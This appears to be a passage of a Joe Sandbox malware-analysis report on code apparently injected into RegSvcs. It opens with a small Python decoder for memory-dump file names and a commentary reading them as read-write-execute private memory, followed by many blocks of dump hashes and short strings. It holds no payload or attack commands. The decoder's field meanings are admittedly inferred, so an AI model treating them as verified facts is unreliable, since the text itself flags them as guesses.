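        "rwx_private": all(r.is_writable_executable_private() for r in regions),
        "protections": sorted({r.protect_name for r in regions}),
    }


if __name__ == "__main__":
    for n in SAMPLE_DUMPS:
        r = parse_sdmp_name(n)
        print(f"pid={r.pid} base=0x{r.base:08X} {r.protect_name} {r.state_name} {r.type_name}")
    print(summarize(SAMPLE_DUMPS))
```

Run against the six names on this page, the lowest base comes out as 0xF40000, matching the "Offset" the report prints, and every region decodes as PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE. A module loaded by the Windows loader would instead show MEM_IMAGE with read-only or execute-read pages, so this is the quick check that these dumps describe unpacked code living in RegSvcs rather than its own image. The caveat stands that the field meanings are inferred; verify them against the sandbox's own documentation before relying on the decoder in a pipeline.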

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8262a2ecc10831351cbf1f81914afc7ec5f655d5ea5f0f3a79561d485b3bdef
                                                                                            • Instruction ID: 34b07d0eff3eff43983c091b6fe15f96a093286c3c7be18cbe514cf07bfd8835
                                                                                            • Opcode Fuzzy Hash: c8262a2ecc10831351cbf1f81914afc7ec5f655d5ea5f0f3a79561d485b3bdef
                                                                                            • Instruction Fuzzy Hash: 6901F2326002099FD7306E51CC85B7A7BA9EF86BE4F041029F78106572CFA5AC82F796
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 21a634253a705f74fcca4926a5aedb2b7fc56aa64a9207f74c4adf40866972d7
                                                                                            • Instruction ID: 1374cb1c78f88c529c15db216f91acc88e2cc30efdc60b1d1260ad5389b5bf6c
                                                                                            • Opcode Fuzzy Hash: 21a634253a705f74fcca4926a5aedb2b7fc56aa64a9207f74c4adf40866972d7
                                                                                            • Instruction Fuzzy Hash: 8D017836500109ABCF129F84DC40AEA3BA6EB4C764F098101FE1866224C676D960EB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: e651be3b5ec3f6a1e61705edc10640ce1603b2db11a60bc838fd6f58bed84b4f
                                                                                            • Instruction ID: 71d0525b28baa521021b58f37e9d568c643187cb42d44a999974e5a1266a23a2
                                                                                            • Opcode Fuzzy Hash: e651be3b5ec3f6a1e61705edc10640ce1603b2db11a60bc838fd6f58bed84b4f
                                                                                            • Instruction Fuzzy Hash: ED9171B2A00219AFEB21DB95CD85FEE77B8EF45B50F140065F600FB1A1DA75AD04DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 9553090470211788c14c0b99d7501db718ae233e192633ad285a2d0c5453fa40
                                                                                            • Instruction ID: 4583a6598cf770ee1639eb142ed1bf1caa08d26a56620ea87ec1bc778ab53eee
                                                                                            • Opcode Fuzzy Hash: 9553090470211788c14c0b99d7501db718ae233e192633ad285a2d0c5453fa40
                                                                                            • Instruction Fuzzy Hash: E691B1B1908340AFD721EF21CC41FABBBE8BF85794F44492DFA8492051DB78D905EB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 9fa32ccb83c85c70ad26febf24b0637d30703f5a0530c6fe32724cb9e310e80b
                                                                                            • Instruction ID: 3e10a7ca2778cf83637cdae399ebea9a90ad2c26439c201730038eb94b8e8106
                                                                                            • Opcode Fuzzy Hash: 9fa32ccb83c85c70ad26febf24b0637d30703f5a0530c6fe32724cb9e310e80b
                                                                                            • Instruction Fuzzy Hash: 7091CE71900608BFDB23ABA4DC55FEFBBB9EF85740F100029F941A7251DB799901DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local
                                                                                            • API String ID: 0-5346580
                                                                                            • Opcode ID: 1825b44e963fe7fbe882d4aade4cccd9198b98a37e67131eed34d3955fa63e8a
                                                                                            • Instruction ID: 5d026474494d9745bdbff5dbdc1a50f7cbc0176c5c68391b3894f12e3d844405
                                                                                            • Opcode Fuzzy Hash: 1825b44e963fe7fbe882d4aade4cccd9198b98a37e67131eed34d3955fa63e8a
                                                                                            • Instruction Fuzzy Hash: 78A1E471E00229DBDB64CF69CC84BA9B3B4BF59724F2441E9E908A7251D7349E80EF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \??\
                                                                                            • API String ID: 0-3047946824
                                                                                            • Opcode ID: 227570bc4c620c0a4969862ed281b4c5dbabda70478e8f40ce56b1be0490d71f
                                                                                            • Instruction ID: ef43c1a8aa1ea4153d03c27114c8df10d12769c01c724e14a35cda19cf6cbd9d
                                                                                            • Opcode Fuzzy Hash: 227570bc4c620c0a4969862ed281b4c5dbabda70478e8f40ce56b1be0490d71f
                                                                                            • Instruction Fuzzy Hash: 67A16971D1122A9BDB31DB24CD99BEAB7B8EF44710F1041EAE90CA7250D7399E84DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8
                                                                                            • API String ID: 0-4194326291
                                                                                            • Opcode ID: 905d3c58330d402f2dbd4fd15e0818cb1d5efc436747825aa7ca25239e5fd52f
                                                                                            • Instruction ID: f937d6a7722a1e6d5b36b741c7b87da46b4ad9c054815362ba9eca10b8e1b039
                                                                                            • Opcode Fuzzy Hash: 905d3c58330d402f2dbd4fd15e0818cb1d5efc436747825aa7ca25239e5fd52f
                                                                                            • Instruction Fuzzy Hash: 9881BFB1E00748AFDB20CF95C841BAEBBB5FB08B58F244119FA05B7280D7B5AD45EB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 8cccacd4a67fef7d34f9f62c00f3ad3d834ab738e898b9184a8411358a012ed9
                                                                                            • Instruction ID: cd59c8b4defa8b4d2cfa11890ad8bdf71cd62684866cf7fd1fcef1da091e8610
                                                                                            • Opcode Fuzzy Hash: 8cccacd4a67fef7d34f9f62c00f3ad3d834ab738e898b9184a8411358a012ed9
                                                                                            • Instruction Fuzzy Hash: 485139B1E0021DAFDF11DFA9CC81AEEBBB8EB48754F100529E611F7291DB399905CB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: fe26feca91da7c8547d660df04d669ca321089cb445d84e668099b4872340d66
                                                                                            • Instruction ID: 7c3b71d40008f6645105ffa5f372b48f24a71f762b80ec112588ad9b876d84b0
                                                                                            • Opcode Fuzzy Hash: fe26feca91da7c8547d660df04d669ca321089cb445d84e668099b4872340d66
                                                                                            • Instruction Fuzzy Hash: F55108B1D1165ADFCB11CF99C980A8DBBF4FF08714F14826AE408AB241D7749951DF94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: 5138efabd0c822361e91ca04f3b255f20066c21857fe022756c17aa91312fbae
                                                                                            • Instruction ID: a547a3d30f307a097fe8b645366591b5aca74520d7a8246346ea2ae1a4a250ec
                                                                                            • Opcode Fuzzy Hash: 5138efabd0c822361e91ca04f3b255f20066c21857fe022756c17aa91312fbae
                                                                                            • Instruction Fuzzy Hash: A7514DB1D0161AEFDB50CF99C98068DFBB1FF08720F50822EE818A7681C374A951DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 9baa6cbc5fb20a5f009e7df1b21861a78372d13141c09e94006c3b31c2163720
                                                                                            • Instruction ID: 355bd0f4cb642b6024c675f575ad8a05fb5f3bb4d67add4bf6598967b8c18bf9
                                                                                            • Opcode Fuzzy Hash: 9baa6cbc5fb20a5f009e7df1b21861a78372d13141c09e94006c3b31c2163720
                                                                                            • Instruction Fuzzy Hash: A441B271E00219EBEF11DAD8CD41FEEBBF8AB15704F04406AEA49B7280DB749E088B50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: e3cf4a7a001f70082d33007e21d706de7e14f1d84091c85d1bdc6df3d10d40b9
                                                                                            • Instruction ID: 21a3fa241df5fa1a305e1c8801b90e76929a79f1d2e0b0a24aec31aab7cc0670
                                                                                            • Opcode Fuzzy Hash: e3cf4a7a001f70082d33007e21d706de7e14f1d84091c85d1bdc6df3d10d40b9
                                                                                            • Instruction Fuzzy Hash: F041E372A042488BFB22EB99CC41BEDBBF4EF45740F140499EA81EB7D2D7389901CB15
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-3694840737
                                                                                            • Opcode ID: b0c5b15ab04f8470ef5372cabfec2e5b8d2f2208a134cb96d3e0f9504d9a5b4a
                                                                                            • Instruction ID: d38b177581bf6e8251bd2f7f1afee35b2acb8cd4320d1e8ec37273dc4a387a46
                                                                                            • Opcode Fuzzy Hash: b0c5b15ab04f8470ef5372cabfec2e5b8d2f2208a134cb96d3e0f9504d9a5b4a
                                                                                            • Instruction Fuzzy Hash: B73129B17447459FD220FF29DD46E2A7794FF81B50F040528F984AB392EA28EC05E7E2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #
                                                                                            • API String ID: 0-1885708031
                                                                                            • Opcode ID: a3aa68492fb2e1c3a73ddb7a8685678bd0911017b10c1945e5d33be3303d7b01
                                                                                            • Instruction ID: 61a2cd2f861f0a68a08872c7e31cc8702607bf9d2a03a87c94699ea12a28aba1
                                                                                            • Opcode Fuzzy Hash: a3aa68492fb2e1c3a73ddb7a8685678bd0911017b10c1945e5d33be3303d7b01
                                                                                            • Instruction Fuzzy Hash: 0331D131A006199AFB23DA69C850FEA7BA9DF05704F144068E981AB2C2CB6AE955CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b367a01b97af68a6a8fb5e341076f66a7cb8515c956afd3755d43f62d133fb74
                                                                                            • Instruction ID: 2ba5eea66dcc042ac47b30792758202e0e57c1e83e46f5c6e20ad8dd055149c0
                                                                                            • Opcode Fuzzy Hash: b367a01b97af68a6a8fb5e341076f66a7cb8515c956afd3755d43f62d133fb74
                                                                                            • Instruction Fuzzy Hash: 1792BC71E042489FDB25DF68C844BEEBBF1FF48714F18805AE845AB251D739AA41EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe64a52ae1de536c01ef64bad9f58167714dbc6fe572b350b71ccb1058a163bb
                                                                                            • Instruction ID: 1eec9cde4824a16cad0462f87d14edc134e0bbdf9022af64b532d2f1ca6d2fc9
                                                                                            • Opcode Fuzzy Hash: fe64a52ae1de536c01ef64bad9f58167714dbc6fe572b350b71ccb1058a163bb
                                                                                            • Instruction Fuzzy Hash: A8825C75E002188BDB24CFA9C880BEDB7B5BF48310F54C16AE85DAB351D7349D81EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7731edbfdc18f47e86477d224a75650a348d1631f5c39b9b980638cd4418ea13
                                                                                            • Instruction ID: a215a506b1225933ff4e5b4d8fa4e20d90ea8d9deb5c337929888602fffc823c
                                                                                            • Opcode Fuzzy Hash: 7731edbfdc18f47e86477d224a75650a348d1631f5c39b9b980638cd4418ea13
                                                                                            • Instruction Fuzzy Hash: EE42F3316083419FE765DF68C890A6FBBE5BF88700F28096DFAC297259D738D845CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 17c2af8b3fdd7328168a311cbd7eb06e57413a805beed2c4f398df1e0f66339a
                                                                                            • Instruction ID: 6836a67ea45bdc362205f6e11efa2aa1004bb9d2c767abd11f148544876ecf6a
                                                                                            • Opcode Fuzzy Hash: 17c2af8b3fdd7328168a311cbd7eb06e57413a805beed2c4f398df1e0f66339a
                                                                                            • Instruction Fuzzy Hash: EF424E75E002198FEB65CF69CC41BADBBF5BF48310F15C09AE589AB282DB349985CF50
